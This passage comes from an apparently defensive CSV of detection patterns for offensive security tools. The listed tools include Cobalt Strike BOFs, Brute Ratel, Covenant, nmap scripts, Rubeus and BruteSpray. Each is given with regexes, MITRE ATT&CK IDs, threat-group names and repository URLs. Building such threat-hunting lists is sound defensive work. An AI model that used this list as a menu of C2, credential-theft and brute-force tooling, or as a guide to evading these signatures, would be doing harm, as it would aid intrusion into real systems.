- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/BRC4_rar",".{0,1000}\/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/breg.x64.o*",".{0,1000}\/breg\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/breg.x86.o*",".{0,1000}\/breg\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/broadcast-ataoe-discover.nse*",".{0,1000}\/broadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-avahi-dos.nse*",".{0,1000}\/broadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-bjnp-discover.nse*",".{0,1000}\/broadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-db2-discover.nse*",".{0,1000}\/broadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dhcp6-discover.nse*",".{0,1000}\/broadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dhcp-discover.nse*",".{0,1000}\/broadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dns-service-discovery.nse*",".{0,1000}\/broadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dropbox-listener.nse*",".{0,1000}\/broadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-eigrp-discovery.nse*",".{0,1000}\/broadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-hid-discoveryd.nse*",".{0,1000}\/broadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-igmp-discovery.nse*",".{0,1000}\/broadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-jenkins-discover.nse*",".{0,1000}\/broadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-listener.nse*",".{0,1000}\/broadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ms-sql-discover.nse*",".{0,1000}\/broadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-netbios-master-browser.nse*",".{0,1000}\/broadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-networker-discover.nse*",".{0,1000}\/broadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-novell-locate.nse*",".{0,1000}\/broadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ospf2-discover.nse*",".{0,1000}\/broadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pc-anywhere.nse*",".{0,1000}\/broadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pc-duo.nse*",".{0,1000}\/broadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pim-discovery.nse*",".{0,1000}\/broadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ping.nse*",".{0,1000}\/broadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-pppoe-discover.nse*",".{0,1000}\/broadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-rip-discover.nse*",".{0,1000}\/broadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-ripng-discover.nse*",".{0,1000}\/broadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-sonicwall-discover.nse*",".{0,1000}\/broadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-sybase-asa-discover.nse*",".{0,1000}\/broadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-tellstick-discover.nse*",".{0,1000}\/broadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-upnp-info.nse*",".{0,1000}\/broadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-versant-locate.nse*",".{0,1000}\/broadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wake-on-lan.nse*",".{0,1000}\/broadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wpad-discover.nse*",".{0,1000}\/broadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-wsdd-discover.nse*",".{0,1000}\/broadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-xdmcp-discover.nse*",".{0,1000}\/broadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Bropper.git*",".{0,1000}\/Bropper\.git.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/bropper.py*",".{0,1000}\/bropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/Browser-C2*",".{0,1000}\/Browser\-C2.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*/browserhistory.csv*",".{0,1000}\/browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/Brute/BruteStager*",".{0,1000}\/Brute\/BruteStager.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/bruteforce.py*",".{0,1000}\/bruteforce\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/bruteforce-ftp.py*",".{0,1000}\/bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-http.py*",".{0,1000}\/bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/Bruteforcer.*",".{0,1000}\/Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/bruteforce-rdp.py*",".{0,1000}\/bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-smb.py*",".{0,1000}\/bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteforce-ssh.py*",".{0,1000}\/bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/bruteratel*",".{0,1000}\/bruteratel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/BruteSploit*",".{0,1000}\/BruteSploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/brutespray.git*",".{0,1000}\/brutespray\.git.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/brutespray_*",".{0,1000}\/brutespray_.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/BruteStager.cs*",".{0,1000}\/BruteStager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 